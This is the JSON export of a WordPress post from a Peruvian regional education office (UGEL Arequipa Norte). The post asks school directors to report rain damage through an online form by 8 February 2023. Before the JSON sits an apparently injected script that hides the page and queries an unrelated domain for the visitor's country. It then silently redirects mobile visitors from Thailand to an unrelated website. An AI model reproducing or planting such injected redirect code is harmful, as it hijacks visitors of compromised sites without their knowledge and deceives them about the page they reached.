<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":2703,"date":"2023-02-07T11:27:18","date_gmt":"2023-02-07T16:27:18","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=2703"},"modified":"2023-02-07T11:27:18","modified_gmt":"2023-02-07T16:27:18","slug":"comunicado-n-o22-2023-la-unidad-de-gestion-educativa-local-arequipa-norte-reitera-a-los-directores-de-instituciones-educativas-de-gestion-publica-y-de-convenio-que-debi","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o22-2023-la-unidad-de-gestion-educativa-local-arequipa-norte-reitera-a-los-directores-de-instituciones-educativas-de-gestion-publica-y-de-convenio-que-debi\/","title":{"rendered":"COMUNICADO N.\u00ba22 \u2013 2023 \u2013 LA UNIDAD DE GESTI\u00d3N EDUCATIVA LOCAL \u2013 AREQUIPA NORTE, REITERA A LOS DIRECTORES DE INSTITUCIONES EDUCATIVAS DE GESTI\u00d3N P\u00daBLICA Y DE CONVENIO, QUE DEBIDO A LAS \u00daLTIMAS PRECIPITACIONES EN LA REGI\u00d3N AREQUIPA, DEBER\u00c1N INFORMAR EN EL FORMULARIO HASTA EL D\u00cdA 08 DE FEBRERO BAJO RESPONSABILIDAD FUNCIONAL Y ADMINISTRATIVA EN EL SIGUIENTE LINK:"},"content":{"rendered":"\n<p><a href=\"https:\/\/forms.gle\/oCsYLutgstTZUXLy7\">https:\/\/forms.gle\/oCsYLutgstTZUXLy7<\/a><\/p>\n\n\n\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/02\/COMUNICADO-PUBLICOS-Y-CONVENIO.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de COMUNICADO-PUBLICOS-Y-CONVENIO.\"><\/object><a id=\"wp-block-file--media-d09ef54d-9354-4313-ba74-208adf78b680\" href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/02\/COMUNICADO-PUBLICOS-Y-CONVENIO.pdf\">COMUNICADO-PUBLICOS-Y-CONVENIO<\/a><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/02\/COMUNICADO-PUBLICOS-Y-CONVENIO.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d09ef54d-9354-4313-ba74-208adf78b680\">Descarga<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>https:\/\/forms.gle\/oCsYLutgstTZUXLy7<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-2703","post","type-post","status-publish","format-standard","hentry","category-comunicados"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=2703"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2703\/revisions"}],"predecessor-version":[{"id":2705,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2703\/revisions\/2705"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=2703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=2703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=2703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}